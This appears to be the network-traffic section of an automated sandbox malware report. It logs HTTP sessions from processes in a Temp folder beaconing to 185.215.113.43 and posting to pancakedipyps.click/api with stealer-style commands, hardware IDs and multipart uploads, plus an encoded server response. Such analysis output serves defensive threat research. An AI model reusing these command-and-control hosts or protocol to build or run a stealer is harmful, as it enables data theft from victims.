                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          16192.168.2.849741185.215.113.43806840C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Dec 18, 2024 09:08:05.425483942 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                          Dec 18, 2024 09:08:06.768769026 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:08:06 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.849713104.21.23.764437656C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:17 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                          2024-12-18 08:07:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                          2024-12-18 08:07:18 UTC1038INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:17 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=s7c6bmqgccceu1851bpfo44shq; expires=Sun, 13-Apr-2025 01:53:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gKQrqzsKYsgd7SRSeU%2FH4nJutaajYaCTdu1pyKTzvKeN2BWNdHcUiiM2h2Bcy2q64sNXp3WqJlyEr51tPLLAkDchPhnVKgcVoe6BAolfdeU6SUUH%2Fjz8M9PcR%2BzRx%2BYtYzoOMqls"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da88efd2241d8-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1825&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1600000&cwnd=218&unsent_bytes=0&cid=f1de7bd00be4f9f0&ts=738&x=0"
                                                                                                                                                                                          2024-12-18 08:07:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                          Data Ascii: 2ok
                                                                                                                                                                                          2024-12-18 08:07:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.849715104.21.23.764437656C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:19 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 46
                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                          2024-12-18 08:07:19 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1034INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:19 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=l46v2383j20k317ncrl944l0h8; expires=Sun, 13-Apr-2025 01:53:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4vcURlwiMD7m1akA2SRSaPLER39VeuFNvPZKdLybfwZ76rFnHAl2jUMArXPd%2FSfLsrkuEmZAxk333RnnBBdrJNiazJY2weZRF29BNBVNw%2FB0FW1hXfCIPNPw5al2HH4vH3V46Lg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da89c0f2b4249-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1674&rtt_var=774&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1744324&cwnd=230&unsent_bytes=0&cid=b6a720c2db3b3ea9&ts=758&x=0"
                                                                                                                                                                                          2024-12-18 08:07:20 UTC335INData Raw: 31 64 34 34 0d 0a 55 61 52 4e 2b 51 34 30 6a 58 2b 79 75 39 59 6a 49 47 65 4f 65 72 6b 56 49 67 4d 65 62 77 35 2b 57 4b 50 71 4e 62 6c 6f 54 44 30 71 68 6a 76 62 4e 41 43 68 58 63 48 65 39 42 6c 55 46 66 73 66 6c 54 64 44 5a 7a 78 56 61 42 38 30 30 49 38 5a 6d 78 34 68 48 32 76 43 4c 4a 56 39 55 61 46 64 31 38 50 30 47 58 73 63 72 42 2f 58 4e 78 67 68 65 77 56 73 48 7a 54 42 69 31 37 57 47 43 42 65 4f 63 67 71 6b 57 74 58 36 52 37 65 31 72 4e 47 52 51 62 6b 46 4e 42 34 53 6d 34 38 51 79 77 62 49 6f 48 51 46 2f 51 4e 4f 46 77 63 78 54 36 53 4c 45 6d 68 42 4a 44 65 75 41 45 61 52 65 38 66 32 33 6c 45 5a 33 55 48 5a 68 59 38 77 49 35 66 79 51 45 71 56 54 6e 47 4b 5a 42 68 58 76 30 54 31 4e 47 34 51 45 38 47 72 46 61 62 63 46 67 68 4a 45 30 2f 4c 6a 6e 51 6d
                                                                                                                                                                                          Data Ascii: 1d44UaRN+Q40jX+yu9YjIGeOerkVIgMebw5+WKPqNbloTD0qhjvbNAChXcHe9BlUFfsflTdDZzxVaB800I8Zmx4hH2vCLJV9UaFd18P0GXscrB/XNxghewVsHzTBi17WGCBeOcgqkWtX6R7e1rNGRQbkFNB4Sm48QywbIoHQF/QNOFwcxT6SLEmhBJDeuAEaRe8f23lEZ3UHZhY8wI5fyQEqVTnGKZBhXv0T1NG4QE8GrFabcFghJE0/LjnQm
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 51 31 36 33 73 5a 4f 6d 77 30 69 48 32 75 47 4b 5a 56 74 57 2b 38 50 32 4e 4b 2f 52 46 41 4f 35 52 58 57 64 30 31 72 63 77 35 73 47 7a 44 4c 68 31 33 66 42 79 4e 5a 4d 38 5a 76 31 53 78 52 39 31 32 49 6d 5a 64 45 55 67 4c 67 44 70 6c 4e 41 48 34 79 46 43 77 62 4e 6f 48 51 46 39 4d 50 4c 56 77 34 79 53 79 54 5a 30 54 76 44 39 62 55 73 56 4e 45 41 4f 49 53 32 47 56 4b 62 33 6f 4f 5a 52 63 7a 78 49 39 54 6d 30 52 75 57 43 75 47 64 39 74 4e 57 2b 51 52 32 73 36 30 41 56 31 4c 39 56 6a 63 65 77 41 35 50 41 6c 74 47 44 76 46 68 6c 6e 66 42 69 68 52 50 73 6b 70 6b 57 78 52 35 52 58 59 32 4c 6c 4b 54 51 58 70 46 64 39 78 54 47 42 35 54 53 4a 63 50 64 6e 49 44 35 73 6b 4b 56 77 68 68 42 71 59 59 6c 6a 6f 43 35 44 47 2b 6c 67 43 41 75 42 59 67 7a 64 4f 5a 48 4d 66
                                                                                                                                                                                          Data Ascii: Q163sZOmw0iH2uGKZVtW+8P2NK/RFAO5RXWd01rcw5sGzDLh13fByNZM8Zv1SxR912ImZdEUgLgDplNAH4yFCwbNoHQF9MPLVw4ySyTZ0TvD9bUsVNEAOIS2GVKb3oOZRczxI9Tm0RuWCuGd9tNW+QR2s60AV1L9VjcewA5PAltGDvFhlnfBihRPskpkWxR5RXY2LlKTQXpFd9xTGB5TSJcPdnID5skKVwhhBqYYljoC5DG+lgCAuBYgzdOZHMf
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 61 51 46 34 4e 4b 48 30 67 34 68 42 71 59 59 6c 6a 6f 43 35 44 47 2b 6c 67 43 41 75 42 59 67 7a 64 4e 61 58 6b 49 59 78 30 77 7a 34 31 64 31 77 49 67 58 43 48 4a 4b 35 74 67 58 75 55 51 33 74 32 38 53 45 6b 4f 36 68 6a 61 66 51 41 76 50 41 70 30 58 47 4b 42 76 46 44 58 42 79 45 64 42 73 55 68 6c 57 74 41 72 77 4b 65 77 50 52 47 54 6b 57 30 57 4e 64 2b 51 47 70 32 43 57 77 62 4e 38 53 4c 55 4e 67 48 4b 56 55 39 77 53 75 58 5a 56 76 70 48 64 66 64 73 56 4e 48 44 4f 41 55 6d 7a 6b 41 5a 6d 52 4e 4e 46 77 56 78 70 35 55 39 41 6b 2f 56 6e 50 5a 59 59 49 73 55 65 4e 64 69 4a 6d 7a 52 45 6f 4f 36 68 44 62 5a 55 56 76 64 77 78 6d 47 6a 76 4d 68 46 48 62 43 79 35 5a 50 38 59 6f 6e 48 35 45 36 68 76 43 30 2f 51 50 41 67 4c 30 57 49 4d 33 64 6e 46 72 48 48 70 65 44
                                                                                                                                                                                          Data Ascii: aQF4NKH0g4hBqYYljoC5DG+lgCAuBYgzdNaXkIYx0wz41d1wIgXCHJK5tgXuUQ3t28SEkO6hjafQAvPAp0XGKBvFDXByEdBsUhlWtArwKewPRGTkW0WNd+QGp2CWwbN8SLUNgHKVU9wSuXZVvpHdfdsVNHDOAUmzkAZmRNNFwVxp5U9Ak/VnPZYYIsUeNdiJmzREoO6hDbZUVvdwxmGjvMhFHbCy5ZP8YonH5E6hvC0/QPAgL0WIM3dnFrHHpeD
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 54 42 53 46 62 50 63 41 70 6c 6d 6c 5a 35 51 2f 59 31 37 6c 4b 54 51 37 2b 47 4e 5a 7a 54 47 56 30 42 6d 5a 63 64 49 47 50 54 35 74 53 62 6d 6f 2b 79 53 2b 59 65 68 62 77 55 38 6d 5a 73 30 30 43 58 61 77 55 31 58 64 50 62 58 41 47 5a 42 30 32 7a 34 39 53 30 67 49 6d 54 54 4c 43 4a 35 70 69 57 65 34 5a 31 64 79 77 52 6b 59 44 34 31 69 56 4e 30 64 35 50 46 55 73 4d 78 33 30 79 6e 62 68 53 6a 45 52 4b 6f 59 6f 6c 79 77 4f 72 78 48 54 31 62 78 4f 52 41 7a 67 45 74 4a 38 54 47 70 34 41 57 55 5a 50 4d 43 4e 55 74 6f 4f 49 6c 55 31 78 53 79 55 59 31 6e 6e 58 5a 36 5a 73 31 6b 43 58 61 77 39 7a 48 78 4f 5a 7a 77 53 49 67 56 36 78 6f 51 58 67 30 6f 69 56 6a 58 41 4b 70 64 74 55 4f 63 59 32 4e 32 31 52 30 51 47 34 78 7a 65 64 6b 39 6c 63 41 4e 6d 48 54 76 4e 67 31
                                                                                                                                                                                          Data Ascii: TBSFbPcAplmlZ5Q/Y17lKTQ7+GNZzTGV0BmZcdIGPT5tSbmo+yS+YehbwU8mZs00CXawU1XdPbXAGZB02z49S0gImTTLCJ5piWe4Z1dywRkYD41iVN0d5PFUsMx30ynbhSjERKoYolywOrxHT1bxORAzgEtJ8TGp4AWUZPMCNUtoOIlU1xSyUY1nnXZ6Zs1kCXaw9zHxOZzwSIgV6xoQXg0oiVjXAKpdtUOcY2N21R0QG4xzedk9lcANmHTvNg1
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 57 7a 54 4b 4b 5a 52 71 56 2b 6f 58 33 4e 36 78 53 6b 30 4a 72 46 61 62 63 46 67 68 4a 45 31 43 46 79 6e 57 69 31 6e 51 48 44 55 66 4c 49 67 32 32 32 74 61 72 30 57 51 32 72 39 4b 52 67 58 67 47 4e 39 36 51 48 4e 7a 43 6d 73 56 4d 64 4f 43 55 4e 77 42 4a 6c 51 38 77 44 32 58 59 6b 54 71 44 38 4b 5a 2b 67 46 46 48 61 78 41 6d 30 46 48 63 57 77 4f 4c 69 30 73 77 70 35 63 31 67 5a 75 51 48 33 66 62 35 78 67 46 72 64 64 31 74 61 39 51 6b 30 45 35 52 54 57 63 6b 6c 6b 66 51 74 6f 46 6a 44 42 6a 6c 48 61 44 79 52 63 4d 73 77 6d 6e 47 52 52 37 41 2b 51 6c 2f 52 47 57 6b 57 30 57 50 4a 77 55 6d 39 73 54 58 4e 53 49 34 47 50 57 35 74 53 62 6c 73 35 79 53 75 63 59 46 44 71 47 39 33 59 75 30 42 43 43 75 67 54 30 6e 46 42 62 48 6b 41 61 41 34 77 79 6f 64 62 30 67 59
                                                                                                                                                                                          Data Ascii: WzTKKZRqV+oX3N6xSk0JrFabcFghJE1CFynWi1nQHDUfLIg222tar0WQ2r9KRgXgGN96QHNzCmsVMdOCUNwBJlQ8wD2XYkTqD8KZ+gFFHaxAm0FHcWwOLi0swp5c1gZuQH3fb5xgFrdd1ta9Qk0E5RTWcklkfQtoFjDBjlHaDyRcMswmnGRR7A+Ql/RGWkW0WPJwUm9sTXNSI4GPW5tSbls5ySucYFDqG93Yu0BCCugT0nFBbHkAaA4wyodb0gY
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 43 4b 59 59 31 58 39 48 4e 62 4c 74 45 78 49 46 2b 59 54 33 6e 70 4e 62 48 38 4c 61 68 63 32 30 34 46 58 32 41 46 75 45 58 50 42 4e 39 73 30 46 73 77 4b 78 74 4f 7a 54 56 51 4f 37 52 76 4e 65 6c 41 68 4d 6b 31 39 47 79 75 42 30 45 48 4c 48 53 6c 41 66 64 39 76 6e 47 41 57 74 31 33 57 30 4c 4a 47 52 41 76 2b 48 64 31 34 54 32 68 31 43 57 51 66 4f 73 57 4d 55 4e 34 4a 49 6c 51 30 78 53 43 66 5a 56 6a 6d 45 70 43 58 39 45 5a 61 52 62 52 59 2b 6d 78 44 62 58 46 4e 63 31 49 6a 67 59 39 62 6d 31 4a 75 55 7a 33 44 4c 35 46 71 55 75 6f 62 32 74 79 30 53 6b 45 4b 36 42 37 66 65 45 42 71 64 51 78 71 47 54 44 4b 6a 6c 72 59 44 43 67 66 66 59 59 6f 67 79 77 4f 72 7a 33 4c 31 4c 68 47 41 68 71 69 41 5a 74 77 54 43 45 6b 54 57 63 51 50 73 61 49 57 74 67 43 4b 31 73 35
                                                                                                                                                                                          Data Ascii: CKYY1X9HNbLtExIF+YT3npNbH8Lahc204FX2AFuEXPBN9s0FswKxtOzTVQO7RvNelAhMk19GyuB0EHLHSlAfd9vnGAWt13W0LJGRAv+Hd14T2h1CWQfOsWMUN4JIlQ0xSCfZVjmEpCX9EZaRbRY+mxDbXFNc1IjgY9bm1JuUz3DL5FqUuob2ty0SkEK6B7feEBqdQxqGTDKjlrYDCgffYYogywOrz3L1LhGAhqiAZtwTCEkTWcQPsaIWtgCK1s5
                                                                                                                                                                                          2024-12-18 08:07:20 UTC320INData Raw: 4e 56 2f 68 53 51 6c 2f 52 47 56 45 57 30 57 4f 55 33 55 6d 4a 73 44 6d 4d 4e 42 49 48 51 54 75 56 4b 4a 55 6b 30 31 69 79 4e 5a 31 76 6a 44 4f 36 5a 37 42 55 51 56 37 35 4b 69 57 67 41 66 6b 4e 44 4c 42 31 36 6d 62 46 4f 6d 78 78 75 42 32 47 49 62 34 6b 73 44 71 39 61 30 38 75 6d 52 30 45 54 37 31 2f 6c 53 57 64 33 64 67 70 38 47 79 33 4f 79 42 6d 62 42 57 34 48 43 6f 59 6d 6e 48 64 48 2b 52 44 41 33 76 52 2b 44 45 58 30 57 49 4d 33 64 57 4a 79 41 32 73 4b 4b 34 79 76 51 64 45 4e 50 6c 67 6b 79 57 2f 56 4c 46 43 76 52 59 4f 58 39 45 56 54 52 62 52 49 69 53 77 56 4d 69 74 64 50 67 4e 30 32 4d 68 42 6d 31 4a 38 45 58 50 55 62 38 4d 73 45 65 77 50 77 74 2b 33 56 30 46 43 30 69 62 38 62 55 31 6e 61 78 78 53 49 6a 33 62 68 56 48 4d 47 32 4a 4b 4d 4d 67 68 6e
                                                                                                                                                                                          Data Ascii: NV/hSQl/RGVEW0WOU3UmJsDmMNBIHQTuVKJUk01iyNZ1vjDO6Z7BUQV75KiWgAfkNDLB16mbFOmxxuB2GIb4ksDq9a08umR0ET71/lSWd3dgp8Gy3OyBmbBW4HCoYmnHdH+RDA3vR+DEX0WIM3dWJyA2sKK4yvQdENPlgkyW/VLFCvRYOX9EVTRbRIiSwVMitdPgN02MhBm1J8EXPUb8MsEewPwt+3V0FC0ib8bU1naxxSIj3bhVHMG2JKMMghn
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 31 38 63 35 0d 0a 4f 69 6c 65 4f 30 78 6f 33 73 5a 4f 6d 78 78 75 42 32 47 49 62 34 6b 73 44 71 39 61 30 38 75 6d 52 30 45 54 37 31 2f 6c 53 57 35 6d 65 67 68 72 44 48 6a 76 67 30 50 63 53 6d 41 66 50 49 5a 33 6f 69 77 65 72 79 4b 65 6d 61 77 42 47 6b 58 5a 47 39 56 35 52 33 64 74 51 45 49 62 50 4d 53 50 52 35 6b 6b 4a 55 73 30 68 6d 48 62 61 68 61 33 54 5a 36 5a 73 46 41 43 58 62 78 4b 67 43 49 54 4e 69 78 66 63 31 49 6a 67 5a 34 58 67 31 68 67 48 79 47 47 64 39 73 72 56 66 30 50 31 74 71 69 51 67 55 37 30 68 76 4e 65 6b 39 71 66 54 4e 53 4d 6a 66 41 69 31 6d 5a 4f 7a 68 53 49 38 55 71 6e 46 4a 6f 34 52 72 45 33 72 70 48 51 6b 57 69 57 4e 51 33 47 46 67 38 52 53 77 6a 64 49 47 51 46 34 4e 4b 47 31 77 39 79 43 69 4e 66 52 76 4d 43 39 33 57 76 30 41 43 53
                                                                                                                                                                                          Data Ascii: 18c5OileO0xo3sZOmxxuB2GIb4ksDq9a08umR0ET71/lSW5meghrDHjvg0PcSmAfPIZ3oiweryKemawBGkXZG9V5R3dtQEIbPMSPR5kkJUs0hmHbaha3TZ6ZsFACXbxKgCITNixfc1IjgZ4Xg1hgHyGGd9srVf0P1tqiQgU70hvNek9qfTNSMjfAi1mZOzhSI8UqnFJo4RrE3rpHQkWiWNQ3GFg8RSwjdIGQF4NKG1w9yCiNfRvMC93Wv0ACS
                                                                                                                                                                                          2024-12-18 08:07:20 UTC1369INData Raw: 30 55 6e 4e 36 44 6e 6f 66 66 66 2b 32 63 4e 55 4e 4c 30 6b 6a 79 79 4f 36 62 30 66 6c 49 2b 37 4d 74 30 39 4d 41 76 6f 4a 6d 7a 6b 41 62 6a 78 56 56 56 78 79 67 62 63 5a 6d 78 4a 75 42 33 50 7a 4c 4a 56 69 55 66 6b 4d 6e 66 36 36 52 6b 4d 54 2f 42 58 58 56 6b 4e 77 64 6b 30 69 58 44 79 42 30 41 57 56 53 69 70 4f 63 35 35 2f 79 54 63 44 76 45 71 41 69 36 73 50 57 30 58 36 57 49 4d 6c 44 69 46 75 54 54 52 63 66 63 4b 61 52 64 30 4a 4f 46 78 30 2b 42 47 2b 65 31 58 2f 47 39 50 6e 69 6d 70 4f 41 2b 73 43 33 48 46 6d 51 54 78 44 4c 42 4e 36 6d 62 45 58 6b 30 6f 52 45 58 50 65 62 38 4d 73 59 2b 77 54 33 74 36 69 55 41 38 67 2b 78 76 4c 63 55 4d 68 4d 6b 31 71 58 47 4b 52 78 68 66 66 47 32 34 48 59 35 52 30 7a 6a 38 42 76 30 2f 50 6c 36 30 42 56 45 57 30 53 70
                                                                                                                                                                                          Data Ascii: 0UnN6Dnofff+2cNUNL0kjyyO6b0flI+7Mt09MAvoJmzkAbjxVVVxygbcZmxJuB3PzLJViUfkMnf66RkMT/BXXVkNwdk0iXDyB0AWVSipOc55/yTcDvEqAi6sPW0X6WIMlDiFuTTRcfcKaRd0JOFx0+BG+e1X/G9PnimpOA+sC3HFmQTxDLBN6mbEXk0oREXPeb8MsY+wT3t6iUA8g+xvLcUMhMk1qXGKRxhffG24HY5R0zj8Bv0/Pl60BVEW0Sp


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.849716104.21.23.764437656C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:21 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=0GDG4JITE956I1I
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 12827
                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                          2024-12-18 08:07:21 UTC12827OUTData Raw: 2d 2d 30 47 44 47 34 4a 49 54 45 39 35 36 49 31 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 47 44 47 34 4a 49 54 45 39 35 36 49 31 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 47 44 47 34 4a 49 54 45 39 35 36 49 31 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 30 47 44 47 34 4a
                                                                                                                                                                                          Data Ascii: --0GDG4JITE956I1IContent-Disposition: form-data; name="hwid"8C6F564B18682ACBAC8923850305D13E--0GDG4JITE956I1IContent-Disposition: form-data; name="pid"2--0GDG4JITE956I1IContent-Disposition: form-data; name="lid"FATE99--test--0GDG4J
                                                                                                                                                                                          2024-12-18 08:07:22 UTC1037INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:22 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=go0mcu27l2ggn6uqca2eplir5u; expires=Sun, 13-Apr-2025 01:54:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inRECvnZLiLSCl10ts7Ed0O5JhaXCRVSNfJgzthd4uXcAu5IsWoH6BcU1sB7gxCL0SZoedyrg3BNsaXZqSl%2Brr4BoGc2sxdxUrsMQNAy3mRHrBe94D6Y%2FgbLD7pkRQOY1Pxj7qX4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f3da8aa1e6a425f-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1629&rtt_var=617&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2848&recv_bytes=13767&delivery_rate=1764350&cwnd=216&unsent_bytes=0&cid=ebdb50e7514a2512&ts=948&x=0"
                                                                                                                                                                                          2024-12-18 08:07:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                          2024-12-18 08:07:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.849717104.21.23.764437656C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-18 08:07:24 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=PDMMS71LW4MB
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 15038
                                                                                                                                                                                          Host: pancakedipyps.click
                                                                                                                                                                                          2024-12-18 08:07:24 UTC15038OUTData Raw: 2d 2d 50 44 4d 4d 53 37 31 4c 57 34 4d 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 36 46 35 36 34 42 31 38 36 38 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 44 4d 4d 53 37 31 4c 57 34 4d 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 44 4d 4d 53 37 31 4c 57 34 4d 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 50 44 4d 4d 53 37 31 4c 57 34 4d 42 0d 0a 43
                                                                                                                                                                                          Data Ascii: --PDMMS71LW4MBContent-Disposition: form-data; name="hwid"8C6F564B18682ACBAC8923850305D13E--PDMMS71LW4MBContent-Disposition: form-data; name="pid"2--PDMMS71LW4MBContent-Disposition: form-data; name="lid"FATE99--test--PDMMS71LW4MBC
                                                                                                                                                                                          2024-12-18 08:07:24 UTC1044INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Wed, 18 Dec 2024 08:07:24 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
